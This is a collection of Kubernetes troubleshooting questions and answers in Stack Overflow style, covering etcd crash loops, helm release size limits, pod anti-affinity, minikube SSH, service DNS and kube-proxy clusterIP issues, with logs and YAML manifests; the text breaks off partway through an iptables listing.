Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.764324 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.764386 1 reflector.go:270] storage/cacher.go:/services/endpoints: watch of *core.Endpoints ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.764440 1 reflector.go:270] storage/cacher.go:/deployments: watch of *apps.Deployment ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: WARNING: 2018/12/26 21:28:06 grpc: addrConn.transportMonitor exits due to: context canceled
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: 2018-12-26 21:28:06.765201 W | etcdserver/api/v3rpc: failed to receive watch request from gRPC stream ("rpc error: code = Unavailable desc = body closed by handler")
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: 2018-12-26 21:28:06.765384 W | etcdserver/api/v3rpc: failed to receive watch request from gRPC stream ("rpc error: code = Unavailable desc = body closed by handler")
</code></pre>
<p>...</p>
<pre><code>Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.784805 1 reflector.go:270] storage/cacher.go:/controllerrevisions: watch of *apps.ControllerRevision ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.784871 1 reflector.go:270] storage/cacher.go:/pods: watch of *core.Pod ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.786587 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.786700 1 reflector.go:270] storage/cacher.go:/horizontalpodautoscalers: watch of *autoscaling.HorizontalPodAutoscaler ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: E1226 21:28:06.788274 1 watcher.go:208] watch chan error: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain dockerd-current[1609]: W1226 21:28:06.788385 1 reflector.go:270] storage/cacher.go:/crd.projectcalico.org/clusterinformations: watch of *unstructured.Unstructured ended with: Internal error occurred: rpc error: code = Canceled desc = stream terminated by RST_STREAM with error code: CANCEL
Dec 26 15:28:06 thalia0.domain oci-systemd-hook[9353]: systemdhook <debug>: 02cb55687848: Skipping as container command is etcd, not init or systemd
Dec 26 15:28:06 thalia0.domain oci-umount[9355]: umounthook <debug>: 02cb55687848: only runs in prestart stage, ignoring
Dec 26 15:28:07 thalia0.domain dockerd-current[1609]: time="2018-12-26T15:28:07.003175741-06:00" level=warning msg="02cb556878485b24e4705dd0efe1051c02f3e3bbbe7b8a7ab23ea71bd6d82b2f cleanup: failed to unmount secrets: invalid argument"
Dec 26 15:28:07 thalia0.domain kubelet[24604]: E1226 15:28:07.006714 24604 pod_workers.go:190] Error syncing pod 0264932236d6afef396f466fc3bd3181 ("etcd-thalia0.domain_kube-system(0264932236d6afef396f466fc3bd3181)"), skipping: failed to "StartContainer" for "etcd" with CrashLoopBackOff: "Back-off 2m40s restarting failed container=etcd pod=etcd-thalia0.domain_kube-system(0264932236d6afef396f466fc3bd3181)"
Dec 26 15:28:07 thalia0.domain kubelet[24604]: E1226 15:28:07.040361 24604 pod_workers.go:190] Error syncing pod 0264932236d6afef396f466fc3bd3181 ("etcd-thalia0.domain_kube-system(0264932236d6afef396f466fc3bd3181)"), skipping: failed to "StartContainer" for "etcd" with CrashLoopBackOff: "Back-off 2m40s restarting failed container=etcd pod=etcd-thalia0.domain_kube-system(0264932236d6afef396f466fc3bd3181)"
</code></pre>
<p>In order to cut down on the noise in the logs, I cordoned off the other nodes.</p>
<p>As noted, if I do a restart of the <code>kubelet</code> service, everything is fine for a while and then the intermittent behavior occurs. </p>
<p>Any suggestions would be most welcome. I am working with our sys admin and he said it appears that <code>etcd</code> is doing frequent restarts. I think trouble begins when the <code>CrashLoopBackOff</code> starts to happen.</p>
| <p>Actually appears to be a RHEL/Docker bug. See <a href="https://bugzilla.redhat.com/show_bug.cgi?id=1655214" rel="nofollow noreferrer">Bug 1655214 - docker exec does not work with registry.access.redhat.com/rhel7:7.3</a></p>
<p>We've applied the fix, and so far things appear to be stable.</p>
|
<p>Basically, I need clarification on whether this is the right way to do it: I am able to run a sed command inside a container on a k8s pod. Now I want to loop the same sed 10 times, but I am not sure whether it is working, though I get no error from the Kubernetes pods or logs. Please confirm whether my looping is good.</p>
<pre><code>'sed -i "s/\(training:\).*/\1 12/" ghav/default_sql.spec.txt &&
lant estimate -e dlav/lat/experiment_specs/default_sql.spec.txt -r /out'
</code></pre>
<p>I want to run this working command 10 times inside the same container. Is the below right?</p>
<pre><code>'for run in $(seq 1 10); do sed -i "s/\(training:\).*/\1 12/" ghav/default_sql.spec.txt &&
lant estimate -e dlav/lat/experiment_specs/default_sql.spec.txt -r /out; done'
</code></pre>
<p>The pod gets created and is running fine, but I am not sure how to confirm that my loop is good and actually runs 10 times...</p>
<p>inside pod describe I see below</p>
<pre><code>Args:
sh
-c
'for run in $(seq 1 10); do sed -i "s/\(training:\).*/\1 12/" ghav/default_sql.spec.txt &&
lant estimate -e dlav/lat/experiment_specs/default_sql.spec.txt -r /out; done'
</code></pre>
| <p>The "<a href="https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#run-a-command-in-a-shell" rel="nofollow noreferrer">Define a Command and Arguments for a Container</a>" does mention:</p>
<blockquote>
<p>To see the output of the command that ran in the container, view the logs from the Pod:</p>
<pre><code>kubectl logs command-demo
</code></pre>
</blockquote>
<p>So make sure that your command, for testing, does echo something, and check the pod logs.</p>
<pre><code>sh -c 'for run in $(seq 1 10); do echo "$run"; done'
</code></pre>
<p>As in:</p>
<pre><code>command: ["/bin/sh"]
args: ["-c", "for run in $(seq 1 10); do echo \"$run\"; done"]
</code></pre>
<p>(using <code>seq</code> here, as mentioned in <a href="https://github.com/kubernetes/kubernetes/issues/56631#issuecomment-348421974" rel="nofollow noreferrer">kubernetes issue 56631</a>)</p>
<p>For any complex sequence of commands that mixes quotes, it is best to wrap the sequence in a script <em>file</em> and call that executable file 10 times.
The logs will then confirm that the loop is executed 10 times.</p>
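<p>One way to do that (a sketch, with hypothetical names) is to ship the script in a ConfigMap and mount it into the container:</p>
<pre><code>apiVersion: v1
kind: ConfigMap
metadata:
  name: run-loop-script        # hypothetical name
data:
  run-loop.sh: |
    #!/bin/sh
    for run in $(seq 1 10); do
      echo "iteration $run"
      sed -i "s/\(training:\).*/\1 12/" ghav/default_sql.spec.txt
      lant estimate -e dlav/lat/experiment_specs/default_sql.spec.txt -r /out
    done
</code></pre>
<p>Mount it with a <code>configMap</code> volume (<code>defaultMode: 0755</code>) and set the container command to <code>["/bin/sh", "/scripts/run-loop.sh"]</code>; the per-iteration <code>echo</code> lines in <code>kubectl logs</code> then confirm the loop ran 10 times.</p>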
|
<p>We have a multi-node setup of our product where we need to deploy multiple Elasticsearch pods. As all these are data nodes and have volume mounts for persistent storage, we don't want to bring two pods up on the same node. I'm trying to use the anti-affinity feature of Kubernetes, but to no avail. </p>
<p>The cluster deployment is done through Rancher. We have 5 nodes in the cluster, and three nodes (let's say <code>node-1</code>, <code>node-2</code> and <code>node-3</code>) have the label <code>test.service.es-master: "true"</code>. So, when I deploy the helm chart and scale it up to 3, Elasticsearch pods are up and running on all these three nodes. But if I scale it to 4, the 4th data node comes up on one of the above-mentioned nodes. Is that the correct behavior? My understanding was that imposing a strict anti-affinity should prevent the pods from coming up on the same node. I've referred to multiple blogs and forums (e.g. <a href="https://banzaicloud.com/blog/k8s-taints-tolerations-affinities/" rel="noreferrer">this</a> and <a href="https://medium.com/@betz.mark/herding-pods-taints-tolerations-and-affinity-in-kubernetes-2279cef1f982" rel="noreferrer">this</a>), and they suggest similar changes to mine. I'm attaching the relevant section of the helm chart.</p>
<p>The requirement is that we need to bring up ES only on those nodes which are labelled with the specific key-value pair mentioned above, and each of those nodes should contain only one pod. Any feedback is appreciated.</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
test.service.es-master: "true"
name: {{ .Values.service.name }}
namespace: default
spec:
clusterIP: None
ports:
...
selector:
test.service.es-master: "true"
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
creationTimestamp: null
labels:
test.service.es-master: "true"
name: {{ .Values.service.name }}
namespace: default
spec:
selector:
matchLabels:
test.service.es-master: "true"
serviceName: {{ .Values.service.name }}
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: test.service.es-master
operator: In
values:
- "true"
topologyKey: kubernetes.io/hostname
replicas: {{ .Values.replicaCount }}
template:
metadata:
creationTimestamp: null
labels:
test.service.es-master: "true"
spec:
affinity:
nodeAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
nodeSelectorTerms:
- matchExpressions:
- key: test.service.es-master
operator: In
values:
- "true"
topologyKey: kubernetes.io/hostname
securityContext:
...
volumes:
...
...
status: {}
</code></pre>
<p><strong>Update-1</strong></p>
<p>As per the suggestions in the comments and answers, I've added the anti-affinity section in template.spec. But unfortunately the issue still remains. The updated yaml looks as follows:</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
test.service.es-master: "true"
name: {{ .Values.service.name }}
namespace: default
spec:
clusterIP: None
ports:
- name: {{ .Values.service.httpport | quote }}
port: {{ .Values.service.httpport }}
targetPort: {{ .Values.service.httpport }}
- name: {{ .Values.service.tcpport | quote }}
port: {{ .Values.service.tcpport }}
targetPort: {{ .Values.service.tcpport }}
selector:
test.service.es-master: "true"
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
creationTimestamp: null
labels:
test.service.es-master: "true"
name: {{ .Values.service.name }}
namespace: default
spec:
selector:
matchLabels:
test.service.es-master: "true"
serviceName: {{ .Values.service.name }}
replicas: {{ .Values.replicaCount }}
template:
metadata:
creationTimestamp: null
labels:
test.service.es-master: "true"
spec:
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: test.service.es-master
operator: In
values:
- "true"
topologyKey: kubernetes.io/hostname
nodeAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
nodeSelectorTerms:
- matchExpressions:
- key: test.service.es-master
operator: In
values:
- "true"
topologyKey: kubernetes.io/hostname
securityContext:
readOnlyRootFilesystem: false
volumes:
- name: elasticsearch-data-volume
hostPath:
path: /opt/ca/elasticsearch/data
initContainers:
- name: elasticsearch-data-volume
image: busybox
securityContext:
privileged: true
command: ["sh", "-c", "chown -R 1010:1010 /var/data/elasticsearch/nodes"]
volumeMounts:
- name: elasticsearch-data-volume
mountPath: /var/data/elasticsearch/nodes
containers:
- env:
{{- range $key, $val := .Values.data }}
- name: {{ $key }}
value: {{ $val | quote }}
{{- end}}
image: {{ .Values.image.registry }}/analytics/{{ .Values.image.repository }}:{{ .Values.image.tag }}
name: {{ .Values.service.name }}
ports:
- containerPort: {{ .Values.service.httpport }}
- containerPort: {{ .Values.service.tcpport }}
volumeMounts:
- name: elasticsearch-data-volume
mountPath: /var/data/elasticsearch/nodes
resources:
limits:
memory: {{ .Values.resources.limits.memory }}
requests:
memory: {{ .Values.resources.requests.memory }}
restartPolicy: Always
status: {}
</code></pre>
| <p>As Egor suggested, you need podAntiAffinity:</p>
<pre><code>apiVersion: apps/v1
kind: Deployment
metadata:
name: redis-cache
spec:
selector:
matchLabels:
app: store
replicas: 3
template:
metadata:
labels:
app: store
spec:
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- store
topologyKey: "kubernetes.io/hostname"
</code></pre>
<p>Source: <a href="https://kubernetes.io/docs/concepts/configuration/assign-pod-node/#always-co-located-in-the-same-node" rel="nofollow noreferrer">https://kubernetes.io/docs/concepts/configuration/assign-pod-node/#always-co-located-in-the-same-node</a></p>
<p>So, with your current label, it might look like this:</p>
<pre><code>spec:
affinity:
nodeAffinity:
# node affinity stuff here
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: "test.service.es-master"
operator: In
values:
- "true"
topologyKey: "kubernetes.io/hostname"
</code></pre>
<p>Ensure that you put this in the correct place in your yaml, or else it won't work.</p>
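<p>Once the pods are rescheduled, you can confirm that no two of them share a node:</p>
<pre><code>kubectl get pods -l test.service.es-master=true -o wide
</code></pre>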
|
<p>Is there any way, using k8s or swarm or any other option, to automate spawning containers on request?</p>
<p>Part of my project is to send an event to an event bus (RabbitMQ) which has a listener for the events; once an event arrives, a new container should be started for each message.</p>
<p>The only option I found was to mount the host's Docker engine into the event-listener container, and I don't really like this solution.</p>
<p>I would like an orchestrator to "listen" to the eventbus or to any other request queue container spawn requests and start them.</p>
<p>Thank you</p>
| <p>This is a broad question, there are many ways on you can accomplish this.</p>
<p>For example:</p>
<ol>
<li><p>Write a simple bash script in an infinite loop that gets a message from RabbitMQ using another program (perhaps written in <a href="https://www.rabbitmq.com/tutorials/tutorial-one-python.html" rel="nofollow noreferrer">Python</a> with Pika). As soon as it gets a message, issue a <code>docker run ...</code> (a minimal sketch of this follows the list).</p></li>
<li><p>Write your own program with <a href="https://pika.readthedocs.io/en/stable/" rel="nofollow noreferrer">Pika</a> that waits for a message and then creates a pod in Kubernetes using the <a href="https://github.com/kubernetes-client/python" rel="nofollow noreferrer">python K8s client</a>.</p></li>
<li><p>You can also use any other language that has a client API for RabbitMQ, Docker, and/or Kubernetes.</p></li>
</ol>
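<p>A minimal sketch of option 1 (the <code>consume-one-message</code> helper is hypothetical; it stands for whatever small program you write to pop one message off the queue, e.g. with Pika):</p>
<pre><code>#!/bin/sh
# Loop forever: block until a message is available, then start a container for it.
while true; do
  msg=$(consume-one-message --queue events) || { sleep 5; continue; }   # hypothetical consumer command
  docker run -d --rm my-worker-image "$msg"                             # placeholder image; message passed as argument
done
</code></pre>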
|
<p>I am able to access the <code>nginx ingress controller</code> on the <code>NodePort</code>. My goal is to access the controller on <code>port 80</code>.</p>
<blockquote>
<p>Output of <code>kubectl -n ingress-nginx describe service/ingress-nginx</code></p>
</blockquote>
<pre><code>Name: ingress-nginx
Namespace: ingress-nginx
Labels: app.kubernetes.io/name=ingress-nginx
app.kubernetes.io/part-of=ingress-nginx
Annotations: kubectl.kubernetes.io/last-applied-configuration:
{"apiVersion":"v1","kind":"Service","metadata":{"annotations":{},"labels":{"app.kubernetes.io/name":"ingress-nginx","app.kubernetes.io/par...
Selector: app.kubernetes.io/name=ingress-nginx,app.kubernetes.io/part-of=ingress-nginx
Type: NodePort
IP: 10.100.48.223
Port: http 80/TCP
TargetPort: 80/TCP
NodePort: http 30734/TCP
Endpoints: 192.168.0.8:80
Port: https 443/TCP
TargetPort: 443/TCP
NodePort: https 32609/TCP
Endpoints: 192.168.0.8:443
Session Affinity: None
External Traffic Policy: Cluster
Events: <none>
</code></pre>
<p>I have a few ideas for solving that problem:</p>
<ul>
<li>redirect incoming traffic on port 30734 to port 80 via <code>iptables</code></li>
<li>resize the NodePort range so port 80 can be a NodePort as well</li>
</ul>
<p>I am not sure whether these are common ways to do this, so I'd love to hear how you usually deal with it. Perhaps another component is necessary?</p>
| <p>The normal way to handle this is with a LoadBalancer mode service which puts a cloud load balancer in front of the existing NodePort so that you can remap the normal ports back onto it.</p>
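<p>In YAML terms, that is just the same Service with <code>type: LoadBalancer</code> (a sketch; on a bare-metal cluster this additionally requires something that implements LoadBalancer services, such as MetalLB):</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
  name: ingress-nginx
  namespace: ingress-nginx
spec:
  type: LoadBalancer
  selector:
    app.kubernetes.io/name: ingress-nginx
    app.kubernetes.io/part-of: ingress-nginx
  ports:
  - name: http
    port: 80
    targetPort: 80
  - name: https
    port: 443
    targetPort: 443
</code></pre>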
|
<p>I am trying to start Kubernetes minikube (v0.32.0) using kvm on Ubuntu 18.04 following the </p>
<blockquote>
<p><a href="https://kubernetes.io/docs/setup/minikube/" rel="nofollow noreferrer">https://kubernetes.io/docs/setup/minikube/</a></p>
</blockquote>
<p>However, it hangs while running:
<code>minikube start --vm-driver kvm2 -v 10</code> or <code>minikube ssh -v 10</code> with</p>
<p><code>Error dialing TCP: ssh: handshake failed: ssh: unable to authenticate, attempted methods [none publickey], no supported methods remain</code>. </p>
<p>I can connect to the minikube VM with "ssh [email protected]", so I believe <code>minikube ssh</code> does not work because it does not use the same parameters. How do I configure it to do so?</p>
<ul>
<li>I did manage to log in to minikube through the KVM front-end using docker/tcuser and copy my public ssh key, but it did not help.</li>
<li>My ~/.minikube/machines/minikube/config.json for authentication is:</li>
</ul>
<blockquote>
<pre><code>"AuthOptions": {
"CertDir": "/home/badgers/.minikube",
"CaCertPath": "/home/badgers/.minikube/certs/ca.pem",
"CaPrivateKeyPath": "/home/badgers/.minikube/certs/ca-key.pem",
"CaCertRemotePath": "",
"ServerCertPath": "/home/badgers/.minikube/machines/server.pem",
"ServerKeyPath": "/home/badgers/.minikube/machines/server-key.pem",
"ClientKeyPath": "/home/badgers/.minikube/certs/key.pem",
"ServerCertRemotePath": "",
"ServerKeyRemotePath": "",
"ClientCertPath": "/home/badgers/.minikube/certs/cert.pem",
"ServerCertSANs": null,
"StorePath": "/home/badgers/.minikube"
</code></pre>
</blockquote>
| <p>Is your VM really starting? Are you running on bare metal or nested virtualization? Generally, your ssh private key to connect to the VM will be under:</p>
<pre><code>/home/badgers/.minikube/machines/minikube/id_rsa
</code></pre>
<p>You can check it with:</p>
<pre><code>$ minikube ssh-key
</code></pre>
<p>This is also identified by the <code>SSHKeyPath</code> option in your config:</p>
<pre><code>{
"ConfigVersion": 3,
"Driver": {
"IPAddress": "192.168.x.x",
"MachineName": "minikube",
"SSHUser": "docker",
"SSHPort": 22,
"SSHKeyPath": "/home/badgers/.minikube/machines/minikube/id_rsa",
...
}
</code></pre>
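<p>If <code>minikube ssh</code> keeps failing, you can try the same connection manually with the key minikube generated, to rule out the VM itself:</p>
<pre><code>ssh -i $(minikube ssh-key) docker@$(minikube ip)
</code></pre>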
|
<p>I was using <code>helm upgrade -i xxx myfoo</code> to install/upgrade myfoo.</p>
<p>I followed all the standard docs, but this failure ALWAYS happens as soon as I reach the 7th upgrade!</p>
<p>When I ran the 7th upgrade, it reported the failure below:</p>
<p><code>Error: UPGRADE FAILED: ConfigMap "myfoo.v7" is invalid: []: Too long: must have at most 1048576 characters</code></p>
<p>This is really frustrating! Why does this happen?</p>
| <p>Thank you for your help, I now understand what's going on.</p>
<p>I added some bigger files in the <code>chart/</code> dir, which caused the helm package size to exceed 1 MB.</p>
<p>After removing these bigger files, it works normally again. And now I know why there is a .helmignore file: it is used to tell helm not to include such files in the final helm package file (*.tgz).</p>
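<p>For example, a <code>.helmignore</code> at the chart root could exclude the offending files (the patterns below are illustrative):</p>
<pre><code># .helmignore — patterns excluded from the packaged chart
*.tgz
*.zip
docs/
test-data/
</code></pre>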
|
<p>Step 1: finish installing etcd and kubernetes with YUM on CentOS 7 and shut down the firewall</p>
<p>Step 2: modify the related configuration item in /etc/sysconfig/docker</p>
<blockquote>
<p>OPTIONS='--selinux-enabled=false --insecure-registry gcr.io'</p>
</blockquote>
<p>Step 3: modify the related configuration item in /etc/kubernetes/apiserver</p>
<p>remove </p>
<blockquote>
<p>ServiceAccount</p>
</blockquote>
<p>from the KUBE_ADMISSION_CONTROL configuration item</p>
<p>Step 4: start all the related services of etcd and kubernetes</p>
<p>Step 5: start the ReplicationController for the mysql db</p>
<blockquote>
<p>kubectl create -f mysql-rc.yaml</p>
</blockquote>
<pre><code>apiVersion: v1
kind: ReplicationController
metadata:
name: mysql
spec:
replicas: 1
selector:
app: mysql
template:
metadata:
labels:
app: mysql
spec:
containers:
- name: mysql
image: hub.c.163.com/library/mysql
ports:
- containerPort: 3306
env:
- name: MYSQL_ROOT_PASSWORD
value: "123456"
</code></pre>
<p>Step 6: start the related mysql db service</p>
<blockquote>
<p>kubectl create -f mysql-svc.yaml</p>
</blockquote>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: mysql
spec:
ports:
- port: 3306
selector:
app: mysql
</code></pre>
<p>Step 7: start the ReplicationController for myweb</p>
<blockquote>
<p>kubectl create -f myweb-rc.yaml</p>
</blockquote>
<pre><code>apiVersion: v1
kind: ReplicationController
metadata:
name: myweb
spec:
replicas: 3
selector:
app: myweb
template:
metadata:
labels:
app: myweb
spec:
containers:
- name: myweb
image: docker.io/kubeguide/tomcat-app:v1
ports:
- containerPort: 8080
env:
- name: MYSQL_SERVICE_HOST
value: "mysql"
- name: MYSQL_SERVICE_PORT
value: "3306"
</code></pre>
<p>Step 8: start the related tomcat service</p>
<blockquote>
<p>kubectl create -f myweb-svc.yaml</p>
</blockquote>
<pre><code>apiVersion: v1
kind: Service
metadata:
name: myweb
spec:
type: NodePort
ports:
- port: 8080
nodePort: 30001
selector:
app: myweb
</code></pre>
<p>When I visit from the browser using the nodeport (30001), I get the following exception:</p>
<blockquote>
<p>Error:com.mysql.jdbc.exceptions.jdbc4.CommunicationsException:
Communications link failure The last packet sent successfully to the
server was 0 milliseconds ago. The driver has not received any packets
from the server.</p>
</blockquote>
<hr>
<blockquote>
<p>kubectl get ep</p>
</blockquote>
<pre><code>NAME ENDPOINTS AGE
kubernetes 192.168.57.129:6443 1d
mysql 172.17.0.2:3306 1d
myweb 172.17.0.3:8080,172.17.0.4:8080,172.17.0.5:8080 1d
</code></pre>
<blockquote>
<p>kubectl get svc</p>
</blockquote>
<pre><code>NAME CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes 10.254.0.1 <none> 443/TCP 1d
mysql 10.254.0.5 <none> 3306/TCP 1d
myweb 10.254.220.2 <nodes> 8080:30001/TCP 1d
</code></pre>
<p>From inside any tomcat container I can see the mysql env variables, and the related mysql connection code in the JSP is as below:</p>
<pre><code>Class.forName("com.mysql.jdbc.Driver");
String ip=System.getenv("MYSQL_SERVICE_HOST");
String port=System.getenv("MYSQL_SERVICE_PORT");
ip=(ip==null)?"localhost":ip;
port=(port==null)?"3306":port;
System.out.println("Connecting to database...");
conn = java.sql.DriverManager.getConnection("jdbc:mysql://"+ip+":"+port+"?useUnicode=true&characterEncoding=UTF-8", "root","123456");
</code></pre>
<pre><code>[root@promote ~]# docker exec -it 1470cfaa1b1c /bin/bash
root@myweb-xswfb:/usr/local/tomcat# env | grep MYSQL_SERVICE
MYSQL_SERVICE_PORT=3306
MYSQL_SERVICE_HOST=mysql
root@myweb-xswfb:/usr/local/tomcat# ping mysql
ping: unknown host
</code></pre>
<p><strong>Can someone tell me why I cannot ping the mysql db hostname from inside the tomcat container? Or how to locate the problem further?</strong></p>
<p><a href="https://i.stack.imgur.com/miZ1h.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/miZ1h.png" alt="enter image description here"></a></p>
| <p>I know the reason: it's a DNS problem. The web server cannot resolve the mysql server's hostname to an IP address, so it failed. A temporary solution is to change the hostname the web server uses to the mysql db server's IP. Hope this helps you. Thank you.</p>
<p><a href="https://i.stack.imgur.com/IWOkt.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/IWOkt.png" alt="enter image description here"></a>
<a href="https://i.stack.imgur.com/26NSX.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/26NSX.png" alt="enter image description here"></a>
<a href="https://i.stack.imgur.com/zEQ1V.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/zEQ1V.png" alt="enter image description here"></a></p>
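<p>To confirm it is DNS, you can test name resolution from inside one of the web pods (this assumes a DNS add-on such as kube-dns is supposed to be running, and that <code>nslookup</code> is available in the image):</p>
<pre><code>kubectl exec -ti myweb-xswfb -- nslookup mysql
kubectl get pods -n kube-system      # check whether a kube-dns/coredns pod exists at all
</code></pre>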
|
<p>I set up a single-node Kubernetes cluster following the <a href="https://github.com/kelseyhightower/kubernetes-the-hard-way/blob/1.12.0/docs/08-bootstrapping-kubernetes-controllers.md" rel="nofollow noreferrer">kubernetes-the-hard-way guide</a>, except that I'm running on CentOS 7 and I deploy one master and one worker on the same node. I have already turned off the firewalld service.</p>
<p>After the installation, I deploy a mongodb service, however the cluster IP is not accessible but the endpoint is accessible. The service detail is as follows:</p>
<pre><code>$ kubectl get svc
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes ClusterIP 10.254.0.1 <none> 443/TCP 2m
mongodb ClusterIP 10.254.0.117 <none> 27017/TCP 55s
$ kubectl describe svc mongodb
Name: mongodb
Namespace: default
Labels: io.kompose.service=mongodb
Annotations: kompose.cmd=kompose convert -f docker-compose.yml
kompose.version=1.11.0 (39ad614)
kubectl.kubernetes.io/last-applied-configuration=
{"apiVersion":"v1","kind":"Service","metadata":{"annotations":
{"kompose.cmd":"kompose convert -f docker-compose.yml","kompose.version":"1.11.0
(39ad614...
Selector: io.kompose.service=mongodb
Type: ClusterIP
IP: 10.254.0.117
Port: 27017 27017/TCP
TargetPort: 27017/TCP
Endpoints: 10.254.0.2:27017
Session Affinity: None
Events: <none>
</code></pre>
<p>When I run <code>mongo 10.254.0.2</code> on the host, it works, but when I run <code>mongo 10.254.0.117</code>, it does not work. By the way, if I start another mongo pod, for example</p>
<pre><code>kubectl run mongo-shell -ti --image=mongo --restart=Never bash
</code></pre>
<p>and tried <code>mongo 10.254.0.2</code> and <code>mongo 10.254.0.117</code> from it, neither worked at all.</p>
<p>The kubernetes version I use is 1.10.0.</p>
<p>I think this is a kube-proxy issue, the kube-proxy is configured as follows:</p>
<pre><code>[Unit]
Description=Kubernetes Kube-Proxy Server
Documentation=https://kubernetes.io/docs/concepts/overview/components/#kube-
proxy https://kubernetes.io/docs/reference/generated/kube-proxy/
After=network.target
[Service]
ExecStart=/usr/local/bin/kube-proxy \
--config=/var/lib/kubelet/kube-proxy-config.yaml \
--logtostderr=true \
--v=2
Restart=on-failure
RestartSec=5
LimitNOFILE=65536
[Install]
WantedBy=multi-user.target
</code></pre>
<p>and the config file is</p>
<pre><code>kind: KubeProxyConfiguration
apiVersion: kubeproxy.config.k8s.io/v1alpha1
clientConnection:
kubeconfig: "/var/lib/kubelet/kube-proxy.kubeconfig"
mode: "iptables"
clusterCIDR: "10.254.0.0/16"
</code></pre>
<p>This is the iptables NAT table I get:</p>
<pre><code>sudo iptables -t nat -nL
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */
DOCKER all -- 0.0.0.0/0 0.0.0.0/0 ADDRTYPE match dst-type LOCAL
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
KUBE-SERVICES all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes service portals */
DOCKER all -- 0.0.0.0/0 !127.0.0.0/8 ADDRTYPE match dst-type LOCAL
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
KUBE-POSTROUTING all -- 0.0.0.0/0 0.0.0.0/0 /* kubernetes postrouting rules */
MASQUERADE all -- 172.17.0.0/16 0.0.0.0/0
CNI-0f56c935ec75c77eb189a5fe all -- 10.254.0.0/24 0.0.0.0/0 /* name: "bridge" id: "a54a2f20dbe5d24ec4fb6b059f23aae392cc26853cf2b474a56dff2a2f2d6bb6" */
CNI-d2a650ff06e253010ea31f3d all -- 10.254.0.0/24 0.0.0.0/0 /* name: "bridge" id: "f3252d60a15faa5ff6c4b2aabebdb47aa5652e12c9d874f538b33d6c5913ba47" */
CNI-34b02c799f7bc4e979c15266 all -- 10.254.0.0/24 0.0.0.0/0 /* name: "bridge" id: "5a87d86a62dd299e1d36b2ccd631d58896f2724ad9b4e14a93b9dfaa162b09e3" */
CNI-eb80e2736e1009010a27b4b4 all -- 10.254.0.0/24 0.0.0.0/0 /* name: "bridge" id: "1891a61e27b764e4a36717166a2b83ce7d2baa5258e54f0ea183c4433b04de38" */
CNI-4d1b80b0072ade1be68c43d1 all -- 10.254.0.0/24 0.0.0.0/0 /* name: "bridge" id: "2b90e720350fa78bf6e6756b941526bf181e0b48c6b87207bbc8f097933e67ba" */
CNI-7699fcd0ab82a702bac28bc9 all -- 10.254.0.0/24 0.0.0.0/0 /* name: "bridge" id: "3feed2ec479bd17f82cac60adfd1c79c81d4c53d536daa74a46e05f462e2d895" */
CNI-871343dd2a1a9738c94b4dba all -- 10.254.0.0/24 0.0.0.0/0 /* name: "bridge" id: "1a3a7b27889e54494d1e9699efb158dc8f3bb85b147b80db84038c07fd4c9910" */
CNI-3c0d02d02e5aa29b38ada7ba all -- 10.254.0.0/24 0.0.0.0/0 /* name: "bridge" id: "cdd5d6cf1a772b2acd37471046f53d0aa635733f0d5447a11d76dbb2ee216378" */
Chain CNI-0f56c935ec75c77eb189a5fe (1 references)
target prot opt source destination
ACCEPT all -- 0.0.0.0/0 10.254.0.0/24 /* name: "bridge" id: "a54a2f20dbe5d24ec4fb6b059f23aae392cc26853cf2b474a56dff2a2f2d6bb6" */
